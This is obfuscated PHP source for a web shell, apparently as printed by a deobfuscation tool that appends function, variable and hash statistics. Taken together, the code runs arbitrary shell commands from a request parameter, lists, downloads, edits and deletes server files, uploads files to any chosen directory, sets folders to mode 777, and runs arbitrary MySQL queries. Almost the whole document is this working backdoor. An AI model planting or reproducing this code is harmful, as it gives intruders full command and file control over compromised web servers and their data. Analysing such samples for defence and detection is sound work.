header("\103\x6f\x6e\164\145\x6e\164\x2d\124\x79\160\145\x3a\40\164\145\170\x74\x2f\160\x6c\x61\x69\x6e"); fpassthru($lGuFca); goto lmZOFqa; lmZOFqb: $lGuFcu = $_REQUEST["\x64"]; echo "\x3c\x70\x72\145\76"; if ($lGuFcc = opendir("{$lGuFcu}")) { goto lmZOFub; } echo "\x6f\x70\x65\x6e\144\x69\162\x28\51\40\x66\x61\x69\x6c\x65\144"; goto lmZOFuZ; lmZOFub: echo "\x3c\x68\x32\x3e\x6c\151\163\164\151\156\147\x20\x6f\x66\40"; $lGuFcq = ''; if (!$lGuFuO) { goto lmZOFac; } echo "\74\x61\40\150\x72\145\146\x3d\x27\77\144\x3d{$lGuFuu}\x27\76{$lGuFuu}\x3c\x2f\x61\76"; lmZOFac: foreach (explode($lGuFuu, cleanPath($lGuFcu, $lGuFuO)) as $lGuFuh) { $lGuFcq .= $lGuFuh . $lGuFuu; echo "\x3c\141\x20\150\x72\145\146\75\x27\x3f\x64\75{$lGuFcq}\47\76" . $lGuFuh . "\74\57\141\76" . ($lGuFuh != '' ? $lGuFuu : ''); } echo "\x20\x28\74\141\x20\x74\x61\x72\x67\145\x74\75\x27\137\142\154\141\x6e\153\47\40\150\162\145\146\75\47\x3f\165\160\154\x6f\x61\144\106\x6f\162\155\x3d\61\46\x64\151\162\75" . urlencode(cleanPath($lGuFcu, $lGuFuO)) . "\47\x3e\x75\160\154\157\x61\144\x20\146\x69\154\x65\x3c\x2f\141\x3e\51\40\50\74\x61\40\150\162\145\146\75\47\77\x64\75" . urlencode(cleanPath($lGuFcu, $lGuFuO)) . "\x26\150\154\144\x62\x3d\61\47\76\104\x42\40\x69\156\164\145\x72\x61\x63\164\151\x6f\x6e\x20\x66\x69\x6c\x65\163\x20\x69\x6e\40\x72\x65\144\74\57\141\76\51\74\57\x68\x32\x3e\x20\x28\74\141\40\x74\x61\162\x67\145\x74\x3d\x27\x5f\142\154\x61\x6e\153\x27\40\x68\162\145\146\x3d\47\x3f\x67\172\75" . urlencode(cleanPath($lGuFcu, $lGuFuO)) . "\x27\76\x67\x7a\151\x70\x20\46\x20\144\x6f\167\x6e\x6c\x6f\x61\x64\x20\x66\157\154\144\x65\162\74\57\x61\76\51\40\x28\x3c\x61\40\x74\141\x72\147\145\164\75\47\137\142\x6c\x61\156\153\x27\x20\x68\x72\145\146\75\47\x3f\x63\x68\x6d\x3d" . urlencode(cleanPath($lGuFcu, $lGuFuO)) . "\47\76\143\x68\x6d\157\x64\x20\x66\157\x6c\x64\x65\162\x20\x74\157\x20\x37\67\67\x29\74\57\141\76\40\x28\x74\150\145\163\x65\40\162\x61\x72\x65\154\171\40\167\157\162\x6b\51\x3c\x62\162\x20\x2f\76"; while ($lGuFcm = readdir($lGuFcc)) { if (is_dir("{$lGuFcu}{$lGuFuu}{$lGuFcm}")) { goto lmZOFaG; } if (isset($_REQUEST["\150\x6c\x64\x62"])) { goto lmZOFat; } $lGuFcZ[] = array("\x64\x69\162" => $lGuFcm, "\x63\x6f\154\x6f\x72" => "\142\x6c\x61\x63\153"); goto lmZOFaX; lmZOFat: $lGuFcb = file_get_contents("{$lGuFcu}{$lGuFuu}{$lGuFcm}"); if (stripos($lGuFcb, "\x6d\x79\163\161\154\x5f") || stripos($lGuFcb, "\x6d\171\163\x71\154\x69\x5f") || stripos($lGuFcb, "\x53\x45\x4c\x45\x43\x54\40")) { goto lmZOFaS; } $lGuFcZ[] = array("\x64\x69\162" => $lGuFcm, "\143\x6f\x6c\157\x72" => "\x62\154\x61\x63\x6b"); goto lmZOFaK; lmZOFaS: $lGuFcZ[] = array("\x64\151\x72" => $lGuFcm, "\143\157\x6c\157\x72" => "\x72\x65\144"); lmZOFaK: lmZOFaX: goto lmZOFue; lmZOFaG: if (!($lGuFcm != "\56" && $lGuFcm != "\x2e\56")) { goto lmZOFaZ; } $lGuFch[] = $lGuFcm; lmZOFaZ: lmZOFue: } echo "\74\141\x20\x68\162\145\x66\75\x27\x3f\x64\75{$lGuFcu}{$lGuFuu}\56\x27\76\74\x66\157\156\164\40\143\157\154\x6f\x72\75\x67\x72\x65\x79\76\x2e\12\x3c\57\x66\157\156\164\76\74\x2f\141\76"; echo "\x3c\x61\x20\x68\162\x65\146\x3d\x27\x3f\x64\x3d{$lGuFcu}{$lGuFuu}\56\x2e\x27\x3e\74\x66\157\x6e\164\40\143\157\x6c\157\x72\x3d\x67\x72\x65\x79\76\56\56\12\74\57\146\x6f\x6e\x74\x3e\x3c\x2f\141\76"; if (!isset($lGuFch)) { goto lmZOFuu; } if (!is_array($lGuFch)) { goto lmZOFua; } foreach ($lGuFch as $lGuFcm) { echo "\x3c\x61\40\x68\x72\145\146\x3d\x27\x3f\144\x3d{$lGuFcu}{$lGuFuu}{$lGuFcm}\x27\76\74\x66\x6f\x6e\164\x20\143\x6f\154\157\162\x3d\x67\x72\145\171\76{$lGuFcm}\12\74\57\x66\x6f\156\x74\x3e\x3c\x2f\x61\x3e"; } lmZOFua: lmZOFuu: if (!isset($lGuFcZ)) { goto lmZOFuh; } if (!is_array($lGuFcZ)) { goto lmZOFum; } foreach ($lGuFcZ as $lGuFcm) { echo "\74\x61\40\x68\162\145\x66\x3d\x27\77\146\x3d{$lGuFcu}" . $lGuFuu . $lGuFcm["\x64\151\x72"] . "\47\76\x3c\146\x6f\156\x74\40\143\157\154\157\162\75" . $lGuFcm["\x63\157\x6c\x6f\x72"] . "\x3e" . $lGuFcm["\x64\151\162"] . "\74\57\146\157\156\164\x3e\74\57\141\76" . "\x7c\x3c\141\x20\x68\x72\145\x66\x3d\x27\77\x64\154\75" . cleanPath($lGuFcu, $lGuFuO) . "\x26\x66\151\154\x65\x3d" . $lGuFcm["\x64\x69\x72"] . "\x27\40\164\141\162\x67\x65\164\x3d\47\137\x62\154\141\x6e\153\x27\76\104\157\167\x6e\x6c\157\141\x64\74\x2f\x61\x3e\x7c" . "\174\x3c\x61\x20\x68\162\x65\x66\x3d\x27\77\x65\x66\x3d" . cleanPath($lGuFcu, $lGuFuO) . "\46\146\151\154\145\x3d" . $lGuFcm["\x64\151\x72"] . "\x27\40\164\141\x72\147\145\164\x3d\x27\x5f\x62\x6c\x61\x6e\153\x27\x3e\105\x64\x69\x74\74\x2f\x61\76\x7c" . "\x7c\x3c\141\x20\x68\162\x65\x66\75\47\77\144\x66\x3d" . cleanPath($lGuFcu, $lGuFuO) . "\x26\x66\x69\x6c\145\x3d" . $lGuFcm["\x64\151\x72"] . "\x27\40\164\x61\x72\x67\x65\x74\75\x27\137\x62\x6c\x61\156\x6b\x27\76\104\145\x6c\145\x74\145\x3c\x2f\141\76\x7c\40\12"; } lmZOFum: lmZOFuh: lmZOFuZ: closedir($lGuFcc); goto lmZOFqa; lmZOFqZ: if (!@ini_get("\163\x61\x66\x65\x5f\155\157\x64\x65")) { goto lmZOFuS; } echo "\x53\141\x66\x65\40\x6d\x6f\x64\145\x20\x69\x73\x20\x6f\x6e\x2c\x20\164\x68\x65\x20\x63\157\x6d\155\x61\x6e\x64\x20\151\163\40\x62\171\40\144\x65\x66\141\165\x6c\x74\40\162\x75\156\x20\x74\x68\x6f\x75\x67\x68\40\145\x73\143\x61\160\145\x73\150\145\154\154\x63\155\144\x28\x29\40\141\156\x64\x20\x63\x61\x6e\x20\x6f\156\x6c\x79\x20\x72\165\x6e\x20\160\162\x6f\x67\162\x61\x6d\155\x73\40\151\156\40\x73\x61\146\145\137\x6d\157\144\x5f\145\170\145\x63\137\x64\x69\162\x20\x28" . @ini_get("\163\141\146\x65\137\x6d\157\x64\145\x5f\145\170\145\x63\x5f\144\x69\x72") . "\x29\40\74\x62\x72\x20\x2f\76"; lmZOFuS: echo "\74\142\76\x43\x6f\x6d\155\x61\156\144\72\x20\74\x49\76" . $_REQUEST["\143"] . "\74\x2f\111\x3e\74\x2f\x62\x3e\x3c\142\x72\x20\x2f\x3e\74\x62\162\40\x2f\x3e"; trim(exec($_REQUEST["\x63"], $lGuFcS)); foreach ($lGuFcS as $lGuFuh) { echo "\74\x70\x72\x65\76" . htmlentities($lGuFuh) . "\x3c\57\x70\x72\145\x3e"; } goto lmZOFqa; lmZOFqS: if (isset($_FILES["\146\x69\154\x65\x5f\x6e\141\155\145"])) { goto lmZOFca; } echo "\40\xd\12\x20\x20\x20\40\40\x20\40\40\x3c\x66\x6f\x72\155\40\x74\x61\162\x67\x65\x74\75\42\137\x62\x6c\x61\156\x6b\x22\x20\141\143\164\151\157\x6e\x3d\42\42\40\155\145\x74\150\157\x64\75\x22\x47\105\124\x22\x3e\40\15\12\x20\40\x20\x20\x20\40\40\x20\x20\40\40\x20\x3c\x69\156\160\165\x74\x20\164\x79\160\x65\x3d\x22\x68\151\144\144\x65\x6e\42\40\x6e\141\x6d\x65\75\42\143\143\42\x20\x76\x61\154\165\145\x3d\42\61\x22\40\x2f\76\x20\xd\12\40\40\40\40\40\x20\x20\40\x20\x20\40\x20\123\165\142\x6d\x69\x74\x20\x74\x68\x69\x73\40\146\157\162\x6d\x20\x62\145\x66\x6f\x72\145\x20\x73\x75\x62\x6d\151\x74\164\x69\x6e\x67\40\x66\x69\x6c\x65\40\x28\x77\151\154\x6c\x20\157\160\x65\156\40\151\x6e\40\x6e\145\167\x20\x77\151\x6e\144\x6f\x77\51\x3a\x3c\x62\162\40\x2f\x3e\x20\xd\xa\x20\40\40\40\40\40\40\x20\40\40\40\40\x55\x70\x6c\157\141\144\40\104\x69\162\145\143\x74\x6f\x72\171\x3a\40\x3c\151\x6e\160\x75\x74\40\x74\x79\160\145\x3d\x22\164\x65\170\164\x22\40\156\x61\x6d\145\x3d\x22\x64\x69\162\x22\40\x76\141\x6c\x75\x65\75\42"; echo $_REQUEST["\144\151\162"]; echo "\x22\x3e\x3c\x62\162\40\57\x3e\x20\xd\12\x20\40\40\40\x20\x20\x20\40\x20\x20\40\40\x3c\151\x6e\x70\165\164\40\x74\x79\x70\145\x3d\42\x73\x75\x62\x6d\x69\164\x22\40\166\141\x6c\x75\145\75\x22\163\x75\142\155\x69\164\x22\40\57\x3e\40\xd\xa\x20\40\40\x20\x20\x20\40\x20\74\57\146\x6f\x72\x6d\x3e\40\15\xa\x20\40\40\x20\x20\x20\40\40\x3c\x62\x72\40\57\76\74\142\x72\40\x2f\x3e\x20\xd\xa\40\x20\40\x20\x20\x20\40\x20\x20\xd\12\40\x20\40\40\40\40\40\40\x3c\x66\x6f\x72\x6d\x20\x65\x6e\x63\164\x79\160\x65\x3d\x22\155\x75\x6c\x74\x69\160\141\162\x74\x2f\146\157\x72\155\x2d\x64\x61\164\x61\x22\x20\x61\x63\164\x69\157\x6e\75\42\42\40\155\x65\x74\x68\x6f\144\x3d\x22\x70\157\x73\164\42\x3e\x20\15\xa\x20\x20\x20\40\x20\x20\x20\40\125\160\154\157\x61\x64\x20\x66\x69\x6c\x65\72\74\151\156\x70\x75\164\x20\156\x61\155\145\x3d\42\146\151\x6c\x65\137\156\141\x6d\x65\x22\x20\x74\x79\x70\145\x3d\42\x66\151\x6c\145\x22\x3e\40\x3c\151\x6e\x70\x75\x74\40\164\x79\x70\145\x3d\42\163\x75\142\155\x69\164\x22\40\x76\x61\x6c\x75\x65\x3d\42\x55\160\x6c\157\x61\x64\x22\x20\x2f\x3e\x3c\x2f\x66\x6f\x72\155\76\x20\15\12\15\xa\x20\x20\x20\x20\40\x20\x20\40"; goto lmZOFcu; lmZOFca: if ($_FILES["\x66\151\154\x65\137\x6e\141\155\145"]["\x65\x72\x72\x6f\162"] > 0) { goto lmZOFcO; } $lGuFcK = $_COOKIE["\x75\160\x6c\157\141\x64\x44\151\x72"]; if (!(substr($lGuFcK, -1) != "\x2f")) { goto lmZOFuX; } $lGuFcK .= "\x2f"; lmZOFuX: $lGuFcK = $lGuFcK . basename($_FILES["\146\x69\x6c\x65\x5f\x6e\x61\155\x65"]["\x6e\x61\155\x65"]); if (move_uploaded_file($_FILES["\146\151\x6c\145\137\156\141\155\145"]["\x74\155\160\137\156\x61\155\145"], $lGuFcK)) { goto lmZOFuG; } echo "\x45\162\x72\157\162\x20\x63\x6f\160\x79\x69\156\x67\x20\x66\151\154\145\54\40\x6c\151\153\145\154\x79\x20\x61\x20\160\x65\x72\155\151\163\163\x69\157\156\40\x65\x72\162\x6f\162\56"; goto lmZOFce; lmZOFuG: setcookie("\x75\160\154\157\x61\x64\104\151\x72", ''); echo "\x54\x68\x65\x20\x66\151\154\x65\x20" . basename($_FILES["\x66\151\x6c\x65\x5f\x6e\x61\155\145"]["\156\141\x6d\145"]) . "\x20\150\x61\x73\x20\x62\145\145\x6e\x20\165\x70\154\157\141\144\x65\144"; lmZOFce: goto lmZOFcF; lmZOFcO: echo "\x45\x72\x72\157\162"; lmZOFcF: lmZOFcu: goto lmZOFqa; lmZOFqK: setcookie("\165\160\154\157\141\144\104\151\x72", $_GET["\144\151\x72"]); echo "\131\157\165\40\141\x72\x65\40\x4f\x4b\x20\164\157\40\165\160\x6c\x6f\141\x64\x20\164\x68\145\40\x66\x69\154\x65\x2c\x20\x64\157\x6e\x27\164\x20\165\160\x6c\x6f\x61\144\x20\146\x69\154\x65\x73\x20\164\x6f\40\x6f\164\150\x65\162\40\144\x69\162\x65\x63\164\157\162\151\145\163\x20\x62\145\x66\157\x72\x65\40\x63\x6f\155\160\154\145\164\x69\156\147\40\x74\150\x69\x73\x20\x75\x70\x6c\x6f\x61\x64\x2e"; goto lmZOFqa; lmZOFqt: $lGuFct = $_REQUEST["\x68\157\163\x74"]; $lGuFcX = $_REQUEST["\x75\x73\x72"]; $lGuFcG = $_REQUEST["\160\141\163\163\x77\144"]; $lGuFqe = $_REQUEST["\144\x62"]; $lGuFqO = $_REQUEST["\155\161\x75\x65\x72\x79"]; @mysql_connect($lGuFct, $lGuFcX, $lGuFcG) or die("\103\157\x6e\x6e\x65\x63\164\x69\157\156\x20\x45\x72\162\157\162\x3a\40" . mysql_error()); mysql_select_db($lGuFqe); $lGuFqF = mysql_query($lGuFqO); if ($lGuFqF != false) { goto lmZOFcK; } echo "\121\165\145\x72\171\x20\x45\x72\x72\157\162\72\40" . mysql_error(); goto lmZOFct; lmZOFcK: echo "\74\x68\x32\76\124\x68\145\x20\146\x6f\154\154\x6f\x77\151\156\147\40\161\165\145\x72\171\40\150\141\163\x20\163\165\143\x65\163\163\x66\165\x6c\x6c\x79\x20\x65\x78\x65\143\165\164\x65\144\x3c\x2f\x68\62\x3e" . htmlentities($lGuFqO) . "\74\x62\162\40\x2f\x3e\74\142\162\x20\x2f\x3e"; echo "\122\x65\164\x75\x72\x6e\40\122\145\x73\x75\x6c\164\x73\72\x3c\142\162\40\57\x3e"; $lGuFqa = true; echo "\x3c\164\141\x62\154\x65\40\142\x6f\x72\144\145\x72\75\47\x31\47\x3e"; while ($lGuFqu = mysql_fetch_array($lGuFqF, MYSQL_ASSOC)) { if (!$lGuFqa) { goto lmZOFcb; } echo "\x3c\164\x72\x3e"; foreach ($lGuFqu as $lGuFum => $lGuFuh) { echo "\74\164\144\x3e\x3c\142\x3e{$lGuFum}\74\57\x62\76\x3c\x2f\164\x64\x3e"; } echo "\x3c\x2f\164\x72\x3e"; reset($lGuFqu); $lGuFqa = false; lmZOFcb: echo "\x3c\164\x72\x3e"; foreach ($lGuFqu as $lGuFuh) { echo "\x3c\x74\144\x3e{$lGuFuh}\x3c\x2f\164\x64\x3e"; } echo "\x3c\57\x74\x72\76"; } echo "\x3c\x2f\164\x61\x62\154\145\76"; mysql_free_result($lGuFqF); lmZOFct: goto lmZOFqa; lmZOFqX: $_REQUEST["\x64\x66"] .= $lGuFuu . $_REQUEST["\146\151\154\145"]; if (@unlink($_REQUEST["\x64\146"])) { goto lmZOFcX; } echo "\105\x72\x72\x6f\x72\x20\x64\145\x6c\x65\x74\x69\156\147\x20\x66\x69\154\x65"; goto lmZOFcG; lmZOFcX: echo "\106\x69\x6c\145\x20\144\145\154\x65\x74\145\x64"; lmZOFcG: goto lmZOFqa; lmZOFqG: echo "\x20\15\xa\74\x73\x63\162\x69\160\164\40\164\x79\x70\145\x3d\x22\x74\145\170\164\x2f\152\x61\x76\x61\x73\143\162\x69\160\x74\x22\76\40\xd\xa\40\x20\x3c\41\55\x2d\x20\15\xa\15\12\x20\x20\x76\141\162\40\153\x65\171\x20\x3d\40\42\x41\x42\103\x44\105\x46\x47\110\x49\112\113\x4c\x4d\116\117\x50\121\122\123\124\125\x56\x57\130\x59\132\141\142\x63\x64\x65\146\x67\x68\151\152\153\x6c\155\156\157\160\x71\162\x73\164\165\x76\167\170\x79\172\x30\61\x32\x33\64\65\66\x37\70\71\53\57\75\42\73\40\xd\12\15\12\x20\40\146\x75\x6e\x63\x74\x69\x6f\x6e\x20\x65\156\x63\157\x64\x65\66\64\x28\151\156\x70\123\164\162\x29\40\40\15\xa\40\40\173\40\15\12\x20\x20\x20\40\40\x69\x6e\x70\123\x74\162\40\75\40\145\163\x63\141\160\145\x28\151\x6e\160\123\164\162\x29\x3b\x20\15\xa\40\x20\x20\40\40\x76\141\162\40\157\x75\x74\x70\165\x74\x20\x3d\40\42\x22\73\40\15\12\x20\40\x20\40\40\x76\141\162\x20\x63\150\162\x31\54\40\x63\150\162\62\x2c\x20\143\x68\x72\63\40\x3d\40\42\42\x3b\40\15\12\x20\40\x20\x20\40\x76\x61\x72\x20\145\156\x63\x31\x2c\x20\x65\156\143\62\54\40\x65\x6e\143\x33\54\x20\145\156\x63\64\40\x3d\40\42\42\x3b\x20\xd\12\x20\40\40\40\40\x76\141\x72\40\x69\40\75\40\x30\x3b\x20\xd\12\xd\12\40\40\x20\x20\40\x64\157\40\x7b\40\xd\xa\x20\40\x20\x20\40\x20\40\x20\143\150\162\x31\x20\75\x20\x69\156\x70\x53\x74\162\x2e\x63\x68\x61\162\103\x6f\x64\145\101\x74\x28\151\53\53\51\73\x20\15\xa\40\40\x20\40\40\x20\x20\x20\x63\150\x72\x32\40\x3d\x20\151\156\160\123\164\x72\56\x63\x68\x61\x72\103\x6f\x64\145\101\x74\x28\x69\x2b\x2b\51\73\x20\xd\12\40\40\x20\40\40\x20\40\x20\x63\150\x72\63\x20\x3d\x20\x69\x6e\160\123\164\162\x2e\x63\x68\141\x72\x43\157\x64\145\101\164\x28\151\x2b\x2b\51\x3b\x20\15\12\15\12\x20\40\40\x20\40\40\40\x20\x65\x6e\143\61\40\x3d\x20\x63\150\162\61\x20\x3e\x3e\x20\x32\73\x20\xd\xa\x20\40\40\40\40\x20\40\x20\145\156\143\x32\40\x3d\40\50\x28\143\150\162\61\x20\46\40\63\x29\40\74\74\40\x34\51\x20\x7c\x20\x28\x63\x68\162\x32\40\x3e\76\x20\64\x29\x3b\x20\15\12\40\x20\40\40\x20\40\40\x20\x65\x6e\x63\x33\40\x3d\x20\x28\50\143\x68\x72\x32\x20\46\x20\x31\x35\51\x20\74\74\x20\x32\x29\40\x7c\40\50\143\150\x72\x33\x20\x3e\x3e\40\66\x29\73\x20\15\12\40\40\x20\40\40\x20\40\40\145\156\143\x34\40\75\x20\x63\x68\162\x33\x20\x26\x20\x36\63\x3b\40\15\12\15\xa\x20\x20\x20\x20\x20\40\40\40\151\146\40\50\x69\x73\116\x61\x4e\50\143\150\x72\62\51\x29\40\x20\15\12\40\40\x20\x20\40\40\x20\40\x7b\x20\xd\xa\x20\40\40\x20\40\x20\40\x20\x20\40\x20\x65\156\143\63\40\x3d\x20\x65\x6e\x63\64\40\75\x20\x36\x34\73\40\15\12\x20\40\x20\40\x20\40\40\40\x7d\40\40\15\xa\x20\40\40\x20\40\40\40\40\145\154\x73\x65\40\151\146\x20\50\151\163\x4e\x61\116\50\143\150\162\63\x29\51\x20\40\15\12\x20\x20\x20\x20\40\x20\x20\40\x7b\40\15\12\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x65\156\143\64\x20\x3d\x20\x36\64\x3b\x20\15\12\40\40\40\x20\40\40\40\x20\x7d\x20\15\12\15\12\40\x20\40\40\x20\40\40\40\157\165\164\x70\165\x74\x20\75\40\x6f\165\x74\160\165\x74\40\x2b\40\xd\xa\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\x6b\x65\x79\56\143\150\141\x72\x41\x74\x28\145\156\x63\x31\51\40\x2b\x20\15\12\x20\x20\40\x20\40\40\x20\40\x20\40\x20\153\x65\x79\56\143\x68\141\162\x41\164\50\x65\x6e\143\x32\x29\40\53\40\15\12\40\x20\x20\40\x20\x20\40\40\x20\40\40\x6b\145\171\x2e\x63\x68\141\162\101\x74\50\145\x6e\143\x33\x29\x20\x2b\40\xd\xa\40\40\40\40\40\40\x20\40\x20\x20\x20\153\145\171\56\143\x68\141\162\x41\x74\x28\x65\156\x63\64\51\73\40\15\12\40\40\40\x20\x20\40\x20\x20\143\150\x72\61\x20\75\40\143\x68\x72\x32\x20\75\40\143\x68\162\x33\x20\x3d\40\145\156\x63\x31\40\75\x20\145\156\x63\62\40\75\40\x65\x6e\x63\x33\x20\x3d\x20\x65\156\143\64\x20\75\x20\x22\x22\73\40\15\12\x20\40\40\40\40\x7d\40\x77\150\x69\154\145\x20\50\151\40\74\40\x69\156\x70\123\164\x72\x2e\x6c\145\x6e\147\164\150\x29\x3b\x20\xd\xa\15\xa\x20\40\40\40\40\162\x65\x74\165\x72\156\40\x6f\x75\164\160\x75\164\73\40\15\12\40\40\x7d\x20\xd\xa\xd\12\x20\40\57\x2f\x2d\55\76\x3c\57\x73\143\x72\151\x70\164\x3e\40\15\12\15\xa\40\x20"; $_REQUEST["\x65\146"] .= $_REQUEST["\146\x69\154\145"]; if (!isset($_POST["\x6e\x65\167\143\157\x6e\164\145\156\164"])) { goto lmZOFqF; } $_POST["\156\145\x77\x63\157\x6e\164\x65\156\164"] = urldecode(base64_decode($_POST["\156\145\167\143\157\x6e\164\145\x6e\164"])); $lGuFqc = @fopen($_REQUEST["\145\146"], "\x77"); if ($lGuFqc) { goto lmZOFqe; } echo "\x43\157\165\x6c\144\40\x6e\x6f\x74\40\167\x72\x69\x74\x65\x20\x74\157\40\146\x69\154\145"; goto lmZOFqO; lmZOFqe: fwrite($lGuFqc, $_POST["\x6e\145\x77\143\157\156\x74\x65\156\164"]); echo "\x57\x72\x69\x74\x65\x20\x73\165\x63\x65\163\163\146\165\x6c"; lmZOFqO: fclose($lGuFqc); lmZOFqF: echo "\40\15\12\40\40\x20\x20\74\146\x6f\x72\x6d\x20\141\x63\x74\151\x6f\x6e\x3d\x22\42\40\x6e\x61\155\x65\x3d\42\146\x22\40\x6d\145\x74\x68\157\144\75\x22\120\x4f\x53\124\42\76\x20\15\xa\x20\40\40\x20\x3c\x74\x65\x78\164\141\162\x65\141\40\167\x72\141\x70\75\42\x6f\146\x66\x22\x20\162\x6f\167\x73\x3d\42\x34\60\x22\x20\143\157\154\163\x3d\x22\x31\63\60\x22\40\156\141\155\145\75\x22\x6e\145\167\143\157\x6e\x74\x65\x6e\x74\42\x3e"; echo file_get_contents($_REQUEST["\145\146"]); echo "\x3c\x2f\x74\145\x78\164\x61\x72\x65\x61\76\x3c\142\162\x20\x2f\76\x20\15\xa\x20\40\x20\40\74\x69\156\x70\165\x74\x20\164\x79\160\145\x3d\42\x73\x75\142\155\151\x74\x22\x20\x76\141\x6c\165\x65\75\42\111\40\x62\141\x73\x65\66\x34\x20\x65\156\x63\x6f\x64\x65\144\40\x69\164\x20\x6d\171\x73\x65\154\x66\x2c\x20\x64\157\156\164\x20\162\x75\156\x20\163\x63\162\151\x70\164\x22\x20\57\76\74\x62\162\40\x2f\x3e\40\15\xa\40\x20\x20\x20\74\151\156\x70\165\x74\x20\164\x79\x70\x65\x3d\x22\163\165\x62\155\151\x74\x22\x20\166\x61\x6c\x75\x65\75\42\103\150\141\x6e\147\145\x20\x28\162\x65\x71\x75\151\162\x65\163\x20\152\x61\x76\141\163\143\x72\x69\160\164\x20\164\157\x20\167\x6f\162\x6b\x29\x22\40\x20\157\x6e\143\x6c\151\x63\x6b\75\x22\144\x6f\x63\165\155\x65\156\164\56\146\x2e\x6e\x65\167\143\x6f\156\x74\145\156\164\56\x76\x61\154\x75\x65\x3d\145\156\143\x6f\x64\x65\66\64\50\144\157\143\x75\x6d\x65\156\x74\56\x66\x2e\156\x65\x77\143\x6f\x6e\x74\145\156\164\56\166\141\154\x75\145\51\x3b\42\40\57\76\xd\12\x20\x20\40\40\x3c\57\146\x6f\x72\155\x3e\x20\xd\xa\x20\40\x20\40"; lmZOFqa:

Function Calls

None

Variables

None

Stats

MD5 a62c38f45ef98679efbee135783932fc
Eval Count 0
Decode Time 45 ms